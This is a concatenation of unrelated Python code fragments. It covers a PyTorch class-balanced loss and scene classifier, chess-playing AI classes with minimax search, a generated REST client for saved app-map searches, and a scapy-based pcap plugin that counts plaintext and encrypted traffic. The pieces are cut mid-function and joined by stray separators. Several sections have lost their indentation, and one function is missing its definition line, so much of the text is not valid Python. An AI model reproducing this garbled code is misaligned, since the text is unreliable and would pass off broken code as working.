# `1 - beta**0 == 0` in CB_loss, producing infinite weights for those classes.
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
    """Compute the Class Balanced Loss between `logits` and the ground truth `labels`.

    Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
    where Loss is one of the standard losses used for Neural Networks.

    Args:
        labels: A int tensor of size [batch].
        logits: A float tensor of size [batch, no_of_classes].
        samples_per_cls: A python list of size [no_of_classes].
        no_of_classes: total number of classes. int
        loss_type: string. One of "sigmoid", "focal", "softmax".
        beta: float. Hyperparameter for Class balanced loss.
        gamma: float. Hyperparameter for Focal loss.

    Returns:
        cb_loss: A float tensor representing class balanced loss
    """
    # Effective number of samples per class: (1 - beta^n) / (1 - beta).
    # NOTE(review): a class with n == 0 yields effective_num == 0 and an
    # infinite weight below — confirm samples_per_cls never contains zeros.
    effective_num = 1.0 - np.power(beta, samples_per_cls)
    weights = (1.0 - beta) / np.array(effective_num)
    weights = weights / np.sum(weights) * no_of_classes
    labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
    # Pick each sample's class weight, then broadcast it across all classes.
    weights = torch.tensor(weights).float()
    weights = weights.unsqueeze(0)
    weights = weights.repeat(labels_one_hot.shape[0], 1) * labels_one_hot
    weights = weights.sum(1)
    weights = weights.unsqueeze(1)
    weights = weights.repeat(1, no_of_classes)
    if loss_type == "focal":
        cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
    elif loss_type == "sigmoid":
        # Fixed: the keyword is `weight`; the original `weights=` raised
        # TypeError whenever this branch was taken.
        cb_loss = F.binary_cross_entropy_with_logits(input=logits, target=labels_one_hot, weight=weights)
    elif loss_type == "softmax":
        pred = logits.softmax(dim=1)
        cb_loss = F.binary_cross_entropy(input=pred, target=labels_one_hot.cuda(), weight=weights.cuda())
    return cb_loss
def focal_loss(labels, logits, alpha, gamma):
    """Compute the focal loss between `logits` and the ground truth `labels`.

    Focal loss = -alpha_t * (1-pt)^gamma * log(pt), where pt is the model's
    probability for the true class: pt = p if the label is 1, else 1 - p,
    with p = sigmoid(logit).

    Args:
        labels: A float tensor of size [batch, num_classes].
        logits: A float tensor of size [batch, num_classes].
        alpha: A float tensor of size [batch_size]
            specifying per-example weight for balanced cross entropy.
        gamma: A float scalar modulating loss from hard and easy examples.

    Returns:
        focal_loss: A float32 scalar representing normalized total loss.
    """
    bce = F.binary_cross_entropy_with_logits(input=logits, target=labels, reduction="none")
    if gamma == 0.0:
        modulator = 1.0
    else:
        # (1 - p_t)^gamma evaluated in log space for numerical stability.
        modulator = torch.exp(
            -gamma * labels * logits - gamma * torch.log(1 + torch.exp(-1.0 * logits))
        )
    weighted = alpha * (modulator * bce)
    total = torch.sum(weighted)
    # Normalize by the number of positive labels.
    return total / torch.sum(labels)
class place_model(nn.Module):
    """Scene/place classifier over a clip of frames.

    Pipeline: YOLO backbone features per frame -> 128-d descriptor ->
    BERT-style temporal encoder -> per-frame scene-change logit (fc2) used to
    build frame-aggregation weights -> 22-way place logits (fc3) per frame.
    """

    def __init__(self, num_persons, num_faces, device):
        super(place_model, self).__init__()
        # Backbone initialised from a person-detection YOLO model.
        pre_model = Yolo(num_persons).cuda(device)
        num_face_cls = num_faces
        self.detector = YoloD(pre_model).cuda(device)
        # Reduce the 1024-channel YOLO feature map to a compact descriptor.
        self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
                                        nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
        self.avgpool = nn.AvgPool2d(7, stride=1)
        # self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
        # self.bert_fc1 = torch.nn.Linear(128, 768)
        # self.bert_fc2 = torch.nn.Linear(768, 128)
        self.bert = BERT()
        self.fc2 = torch.nn.Linear(128, 1)  # per-frame scene-change logit
        self.fc3 = torch.nn.Linear(128, 22)  # place classification head
        self.softmax = torch.nn.Softmax(dim=1)
        # # define face
        # self.face_conv = nn.Conv2d(
        #     1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)

    def forward(self, image):
        # image: (N clips, T frames, C, H, W); fold time into the batch axis
        # so the CNN backbone sees ordinary 4-D input.
        N, T, C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
        image = image.reshape(N*T, C, H, W)
        # feature map of backbone
        fmap, output_1 = self.detector(image)
        fmap = self.place_conv(fmap)
        x = self.avgpool(fmap)
        x = x.reshape(N, T, -1)
        # self.lstm_sc.flatten_parameters()
        # N, T = x.size(0), x.size(1)
        # x = self.lstm_sc(x)[0]
        # x = self.bert_fc1(x)
        x = self.bert(x)
        # x = self.bert_fc2(x)
        change = x.reshape(N*T, -1)
        #x = self.fc1(x)
        # Per-frame scalar scene-change score.
        change = self.fc2(change)
        change = change.reshape(N, T)
        #x = x.reshape(N*T, -1)
        # NOTE(review): the block below converts the change logits into
        # per-frame aggregation weights via a max-shifted, cumulative
        # exponential scheme (numerically guarded by the M >= 0 split);
        # intent appears to be weighting frames belonging to the same scene
        # segment — confirm against the training code.
        M, _ = change.max(1)
        w = change - M.view(-1,1)
        w = w.exp()
        w = w.unsqueeze(1).expand(-1,w.size(1),-1)
        w = w.triu(1) - w.tril()
        w = w.cumsum(2)
        w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
        ww = w.new_empty(w.size())
        idx = M>=0
        ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
        idx = ~idx
        ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
        ww = (ww+1e-10).pow(-1)
        ww = ww/ww.sum(1,True)
        # Aggregate frame features with the computed weights, then classify.
        x = ww.transpose(1,2).bmm(x)
        x = x.reshape(N*T, -1)
        x = self.fc3(x)
        x = x.reshape(N*T, -1)
        return x
class BERT(nn.Module):
    """
    BERT model : Bidirectional Encoder Representations from Transformers.

    Used here as a temporal encoder over pre-embedded continuous features;
    padding masks are disabled (every block receives mask=None).
    """

    def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
        """
        :param vocab_size: vocab_size of total words (unused: inputs are
            continuous features, see BERTEmbedding)
        :param hidden: BERT model hidden size
        :param n_layers: numbers of Transformer blocks(layers)
        :param attn_heads: number of attention heads
        :param dropout: dropout rate
        """
        super(BERT, self).__init__()
        self.hidden = hidden
        self.n_layers = n_layers
        self.attn_heads = attn_heads
        # The paper sizes the feed-forward network at 4x the hidden size.
        self.feed_forward_hidden = hidden * 4
        # Embedding adds positional information only (no token/segment tables).
        self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
        self.transformer_blocks = nn.ModuleList(
            [TransformerBlock(hidden, attn_heads, hidden * 4, dropout)
             for _ in range(n_layers)]
        )

    def forward(self, x):
        """Add positional embeddings to `x` and run the transformer stack."""
        hidden_states = self.embedding(x)
        for block in self.transformer_blocks:
            hidden_states = block.forward(hidden_states, None)
        return hidden_states
class BERTEmbedding(nn.Module):
    """
    Adds sinusoidal positional information to an already-embedded sequence.

    The token and segment embeddings of the original BERT are disabled here
    (commented out upstream); the input is treated as a ready-made feature
    sequence, so `vocab_size` is accepted but unused.
    """

    def __init__(self, vocab_size, embed_size, dropout=0.):
        """
        :param vocab_size: total vocab size (unused)
        :param embed_size: feature size of the incoming sequence
        :param dropout: dropout rate
        """
        super(BERTEmbedding, self).__init__()
        self.position = PositionalEmbedding(d_model=embed_size)
        self.dropout = nn.Dropout(p=dropout)
        self.embed_size = embed_size

    def forward(self, sequence):
        """Return sequence + positional encoding, with dropout applied."""
        positioned = sequence + self.position(sequence)
        return self.dropout(positioned)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model, max_len=512):
super(PositionalEmbedding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model).float()
pe.require_grad = False
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = (torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model)).exp()
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
| |
advanced_end_game_piece_score(piece_type, position, color):
if color == chess.WHITE:
if piece_type == chess.PAWN:
# pawn score at the given position based on the modifier + the value of the piece
return end_game_white_pawn_modifier[position] + 10
elif piece_type == chess.KNIGHT:
# pawn score at the given position based on the modifier + the value of the piece
return white_knight_modifier[position] + 35
elif piece_type == chess.BISHOP:
# pawn score at the given position based on the modifier + the value of the piece
return white_bishop_modifier[position] + 35
elif piece_type == chess.ROOK:
# pawn score at the given position based on the modifier + the value of the piece
return white_rook_modifier[position] + 52.5
elif piece_type == chess.QUEEN:
# pawn score at the given position based on the modifier + the value of the piece
return white_queen_modifier[position] + 100
elif piece_type == chess.KING:
# pawn score at the given position based on the modifier + the value of the piece
return white_king_modifier[position] + 1000
elif color == chess.BLACK:
if piece_type == chess.PAWN:
# pawn score at the given position based on the modifier + the value of the piece
return end_game_black_pawn_modifier[position] + 10
elif piece_type == chess.KNIGHT:
# pawn score at the given position based on the modifier + the value of the piece
return black_knight_modifier[position] + 30
elif piece_type == chess.BISHOP:
# pawn score at the given position based on the modifier + the value of the piece
return black_bishop_modifier[position] + 30
elif piece_type == chess.ROOK:
# pawn score at the given position based on the modifier + the value of the piece
return black_rook_modifier[position] + 50
elif piece_type == chess.QUEEN:
# pawn score at the given position based on the modifier + the value of the piece
return black_queen_modifier[position] + 90
elif piece_type == chess.KING:
# pawn score at the given position based on the modifier + the value of the piece
return black_king_modifier[position] + 1000
class ChessAI:
    """Base class for chess AIs: holds a scratch board and the AI's color."""

    def __init__(self, color=None):
        # the board used for calculating AI moves
        self.board = AIBoard()
        # Delegate color parsing so it is defined in exactly one place
        # (the original duplicated this logic in __init__ and change_color).
        self.change_color(color)

    def change_color(self, color=None):
        """Set the AI's color from 'w'/'b'; anything else leaves it unset."""
        if color == "w":
            self.color = chess.WHITE
        elif color == "b":
            self.color = chess.BLACK

    def get_move(self, fen):
        """Return the AI's move for `fen`; base implementation is a no-op."""
        return
class RandomAI(ChessAI):
    """AI that plays a uniformly random legal move."""

    def __init__(self, color=None):
        super().__init__(color)

    def get_move(self, fen):
        """Load `fen` into the scratch board and return a random legal move."""
        self.board.set_fen(fen)
        return self.board.random_move()
class PointAI(ChessAI):
    """Greedy one-ply AI: picks the move maximizing its basic point score."""

    def get_move(self, fen):
        """Return the best one-ply move for `fen` by point value.

        Moves whose resulting score equals the current score are "neutral";
        when nothing strictly improves the score, one of them is chosen at
        random (falling back to a random legal move if none exist).
        """
        self.board.set_fen(fen)
        best_move = None
        best_score = -9999
        neutral_score = self.board.calculate_score(self.color)
        neutral_moves = []
        for move in self.board.legal_moves:
            self.board.push(move)
            # Score the position once instead of up to three times per move
            # (the original re-ran calculate_score in each comparison).
            score = self.board.calculate_score(self.color)
            if score > best_score:
                best_move = move
                best_score = score
            elif score == neutral_score:
                neutral_moves.append(move)
            self.board.pop()
        if best_score == neutral_score:
            try:
                best_move = random.choice(neutral_moves)
            except IndexError:
                best_move = self.board.random_move()
        return best_move
class AdvancedPointAI(ChessAI):
    """Greedy one-ply AI using positional (advanced) scoring."""

    def get_move(self, fen):
        """Return the best one-ply move for `fen` by advanced point value."""
        self.board.set_fen(fen)
        best_move = None
        best_score = -9999
        # Fixed: the baseline and the per-move comparison now both use the
        # advanced score. The original compared an advanced best score
        # against a *basic* neutral score, skewing neutral-move detection
        # (AdvancedMiniMaxAI already uses the advanced score here).
        neutral_score = self.board.calculate_advanced_score(self.color)
        neutral_moves = []
        for move in self.board.legal_moves:
            self.board.push(move)
            # Score once per move instead of recomputing in each comparison.
            score = self.board.calculate_advanced_score(self.color)
            if score > best_score:
                best_move = move
                best_score = score
            elif score == neutral_score:
                neutral_moves.append(move)
            self.board.pop()
        if best_score == neutral_score:
            try:
                best_move = random.choice(neutral_moves)
            except IndexError:
                best_move = self.board.random_move()
        return best_move
class MiniMaxAI(ChessAI):
    """Two-ply minimax AI (alpha-beta pruned) over the basic point score."""

    def __init__(self, color=None):
        super().__init__(color)

    def get_move(self, fen):
        """Pick the legal move whose minimax value is highest."""
        self.board.set_fen(fen)
        best_move = None
        best_score = -9999
        # Moves whose value equals the current score; chosen from at random
        # when the search finds nothing strictly better.
        neutral_score = self.board.calculate_score(self.color)
        neutral_moves = []
        for move in self.board.legal_moves:
            self.board.push(move)
            value = self.minmax(2, -10000, 10000, False)
            self.board.pop()
            # '<=' keeps the latest move among ties (original behavior).
            if best_score <= value:
                best_move = move
                best_score = value
            elif value == neutral_score:
                neutral_moves.append(move)
        if best_score == neutral_score:
            try:
                best_move = random.choice(neutral_moves)
            except IndexError:
                best_move = self.board.random_move()
        return best_move

    def minmax(self, depth, alpha, beta, is_maximizing):
        """Alpha-beta minimax; returns the point value at the given depth."""
        if depth == 0:
            return self.board.calculate_score(self.color)
        moves = self.board.valid_moves()
        if is_maximizing:
            best = -9999
            for move in moves:
                self.board.push(move)
                best = max(best, self.minmax(depth - 1, alpha, beta, False))
                self.board.pop()
                if best >= beta:
                    # beta cutoff: opponent will never allow this line
                    return best
                alpha = max(alpha, best)
            return best
        best = 9999
        for move in moves:
            self.board.push(move)
            best = min(best, self.minmax(depth - 1, alpha, beta, True))
            self.board.pop()
            if best <= alpha:
                # alpha cutoff: we already have a better line elsewhere
                return best
            beta = min(beta, best)
        return best
# minmax AI using basic scoring
class AdvancedMiniMaxAI(ChessAI):
def __init__(self, color=None):
super().__init__(color)
# get the AI's move from a given fen
def get_move(self, fen):
self.board.set_fen(fen)
# keeps track of the move that results in the highest score for the AI and what that score is
best_move = None
best_score = -9999
# keeps track of neutral moves, if the AI's best score is the same as it's current then choose from the neutral
# move pool
neutral_score = self.board.calculate_advanced_score(self.color)
neutral_moves = []
# number of valid moves
num_pieces = self.board.count_pieces()
# find the best of the legal moves
for move in self.board.legal_moves:
# make the move
self.board.push(move)
# # count pieces
self.board.count_pieces()
score = self.minmax(2, -10000, 10000, False)
# undo the move
self.board.pop()
# if the score is higher than the current best score then set the best move and best_score
if best_score | |
in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_saved_app_map_searches_for_user(self, **kwargs): # noqa: E501
"""Get all searches for a user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches_for_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs) # noqa: E501
return data
def get_all_saved_app_map_searches_for_user_with_http_info(self, **kwargs):  # noqa: E501
    """Get all searches for a user  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_all_saved_app_map_searches_for_user_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int offset:
    :param int limit:
    :return: ResponseContainerPagedSavedAppMapSearch
             If the method is called asynchronously,
             returns the request thread.
    """
    # Accepted keyword arguments: endpoint parameters + transport controls.
    all_params = ['offset', 'limit', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_all_saved_app_map_searches_for_user" % key
            )
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    # Forward paging parameters only when the caller supplied them.
    query_params = [(opt, params[opt]) for opt in ('offset', 'limit') if opt in params]
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['api_key']  # noqa: E501
    return self.api_client.call_api(
        '/api/v2/savedappmapsearch/owned', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ResponseContainerPagedSavedAppMapSearch',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_saved_app_map_search(self, id, **kwargs):  # noqa: E501
    """Get a specific search  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_saved_app_map_search(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: (required)
    :return: ResponseContainerSavedAppMapSearch
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request just the response payload from the transport layer.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous path: hand the request thread back immediately.
        return self.get_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
    # Synchronous path: return the unwrapped response data.
    return self.get_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
def get_saved_app_map_search_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get a specific search  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_saved_app_map_search_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: (required)
    :return: ResponseContainerSavedAppMapSearch
             If the method is called asynchronously,
             returns the request thread.
    """
    # Accepted keyword arguments: endpoint parameters + transport controls.
    all_params = ['id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_saved_app_map_search" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in params or
                                                   params['id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `id` when calling `get_saved_app_map_search`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['api_key']  # noqa: E501
    return self.api_client.call_api(
        '/api/v2/savedappmapsearch/{id}', 'GET',
        path_params,
        [],  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_saved_app_map_search(self, id, **kwargs):  # noqa: E501
    """Update a search  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_saved_app_map_search(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: (required)
    :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
    :return: ResponseContainerSavedAppMapSearch
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request just the response payload from the transport layer.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous path: hand the request thread back immediately.
        return self.update_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
    # Synchronous path: return the unwrapped response data.
    return self.update_saved_app_map_search_with_http_info(id, **kwargs)  # noqa: E501
def update_saved_app_map_search_with_http_info(self, id, **kwargs):  # noqa: E501
    """Update a search  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_saved_app_map_search_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: (required)
    :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
    :return: ResponseContainerSavedAppMapSearch
             If the method is called asynchronously,
             returns the request thread.
    """
    # Accepted keyword arguments: endpoint parameters + transport controls.
    all_params = ['id', 'body', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_saved_app_map_search" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in params or
                                                   params['id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `id` when calling `update_saved_app_map_search`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501
    # Optional request body (the SavedAppMapSearch payload).
    body_params = params.get('body')
    # HTTP headers `Accept` and `Content-Type`
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['api_key']  # noqa: E501
    return self.api_client.call_api(
        '/api/v2/savedappmapsearch/{id}', 'PUT',
        path_params,
        [],  # no query parameters for this endpoint
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='ResponseContainerSavedAppMapSearch',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_saved_app_map_search_for_user(self, id, **kwargs):  # noqa: E501
    """Update a search belonging to the user  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_saved_app_map_search_for_user(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: (required)
    :param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
    :return: ResponseContainerSavedAppMapSearch
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request just the response payload from the transport layer.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous path: hand the request thread back immediately.
        return self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs)  # noqa: E501
    # Synchronous path: return the unwrapped response data.
    return self.update_saved_app_map_search_for_user_with_http_info(id, **kwargs)  # noqa: E501
def update_saved_app_map_search_for_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a search belonging to the user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_saved_app_map_search_for_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param SavedAppMapSearch body: Example Body: <pre>{ \"name\": \"beachshirts shopping\", \"searchFilters\": { \"filters\": [ { \"filterType\": \"OPERATION\", \"values\": { \"logicalValue\": [ [ \"beachshirts.\", \"shopping\" ] ] } } ] } }</pre>
:return: ResponseContainerSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_saved_app_map_search_for_user" % key
)
params[key] = val
del params['kwargs']
# | |
# Source repository: rashley-iqt/network-tools
"""
Plugin that takes pcap files and outputs stats
Created on 1 November 2019
@author: <NAME>
"""
from datetime import datetime
import json
import os
import shlex
import subprocess
import sys
import pika
from enchant.tokenize import get_tokenizer
from scapy.all import *
def striptxt_pcap(pcap):
    """Classify pcap sessions as plaintext or encrypted and tally statistics.

    Each TCP/UDP payload is decoded as UTF-8 and run through an English
    dictionary tokenizer: payloads containing recognizable words are treated
    as plaintext, decodable-but-wordless payloads as encrypted, and payloads
    that fail to decode (or packets lacking the layer) are skipped, leaving
    the session classification 'unknown'.

    :param pcap: path of the pcap file to analyze.
    :return: {'convcontents': {...}} with packet and byte totals per class
             plus deduplicated 'src:sport,dst:dport' conversation tuples.
    """
    tokenizer = get_tokenizer("en_US")
    capture = rdpcap(pcap)
    sessions = capture.sessions()
    packet_count = 0
    unencrypted_packet_count = 0
    encrypted_packet_count = 0
    encrypted_len = 0
    unencrypted_len = 0
    convs = {'Total Packets': 0, 'Plaintext Packets': 0, 'Encrypted Packets': 0, 'Plaintext Bytes': 0, 'Encrypted Bytes': 0, 'Plaintext Conversations': [], 'Encrypted Conversations': []}
    for session in sessions:
        encrypted = 'unknown'
        session_packets = 0
        for packet in sessions[session]:
            session_packets += 1
            packet_count += 1
            # Try both transport layers; missing layers and undecodable
            # payloads are skipped best-effort (deliberate except/pass).
            for proto in (TCP, UDP):
                try:
                    payload = bytes(packet[proto].payload).decode('utf-8')
                    words = [w for w in tokenizer(payload)]
                    encrypted = 'Plaintext Conversations' if words else 'Encrypted Conversations'
                    # BUG FIX: these counters were swapped -- plaintext
                    # payload bytes were credited to the encrypted total
                    # and vice versa.
                    if encrypted == 'Plaintext Conversations':
                        unencrypted_len += len(packet[proto].payload)
                    else:
                        encrypted_len += len(packet[proto].payload)
                    convs[encrypted].append(f'{packet[IP].src}:{packet[proto].sport},{packet[IP].dst}:{packet[proto].dport}')
                except Exception:
                    pass
        # Attribute all packets of the session to its final classification.
        if encrypted == 'Plaintext Conversations':
            unencrypted_packet_count += session_packets
        elif encrypted == 'Encrypted Conversations':
            encrypted_packet_count += session_packets
    convs['Total Packets'] = packet_count
    convs['Plaintext Packets'] = unencrypted_packet_count
    convs['Encrypted Packets'] = encrypted_packet_count
    convs['Plaintext Bytes'] = unencrypted_len
    convs['Encrypted Bytes'] = encrypted_len
    # Deduplicate the conversation endpoint tuples.
    convs['Plaintext Conversations'] = list(set(convs['Plaintext Conversations']))
    convs['Encrypted Conversations'] = list(set(convs['Encrypted Conversations']))
    results = {'convcontents': convs}
    print(results)
    return results
def connect_rabbit(host='messenger', port=5672, queue='task_queue'):
    """Open a blocking RabbitMQ connection and return a channel.

    The named queue is declared durable before the channel is returned.
    """
    connection = pika.BlockingConnection(pika.ConnectionParameters(host=host, port=port))
    channel = connection.channel()
    channel.queue_declare(queue=queue, durable=True)
    return channel
def send_rabbit_msg(msg, channel, exchange='', routing_key='task_queue'):
    """Publish *msg* as persistent JSON on *channel* and log the send.

    *msg* must be JSON-serializable and carry 'id' and 'file_path' keys
    (both are echoed in the log line).
    """
    properties = pika.BasicProperties(delivery_mode=2)  # 2 = persistent
    channel.basic_publish(exchange=exchange,
                          routing_key=routing_key,
                          body=json.dumps(msg),
                          properties=properties)
    print(" [X] %s UTC %r %r" % (str(datetime.utcnow()),
                                 str(msg['id']), str(msg['file_path'])))
    return
def get_version():
    """Return the last line of the local VERSION file, stripped.

    Returns '' when the file is empty; raises OSError when it is missing.
    """
    with open('VERSION', 'r') as handle:
        contents = handle.read()
    version = ''
    for text in contents.splitlines():
        version = text.strip()
    return version
def get_path():
    """Return the first command-line argument, or None when absent."""
    try:
        return sys.argv[1]
    except Exception as e:
        # No argument supplied: report it and fall through to None.
        print("No path provided: {0}, quitting".format(str(e)))
        return None
def parse_capinfos(output):
    """Parse `capinfos` text output into a nested dict.

    General 'Name: value' fields land directly under results['capinfos'];
    the per-interface section (framed by the 'Number of interfaces in file:'
    count, with 'Name = value' rows) is collected under the 'interfaces' key.

    :param output: raw stdout of the capinfos command.
    :return: {'capinfos': {...general fields..., 'interfaces': {...}}}
    """
    results = {'capinfos': {}}
    iface_total = 0   # interfaces announced by capinfos
    iface_seen = 0    # interface blocks fully consumed so far
    iface_dict = {}
    iface_name = ''
    for line in output.split('\n'):
        if not line:
            continue
        if line.startswith('Number of interfaces in file:'):
            iface_total = int(line.split(':', 1)[1].strip())
        elif iface_seen < iface_total:
            # Inside the per-interface section.
            if line.startswith('Interface '):
                iface_name = line.split()[1]
                iface_dict[iface_name] = {}
            else:
                if line.startswith('Number of packets '):
                    # Last field of an interface block.
                    iface_seen += 1
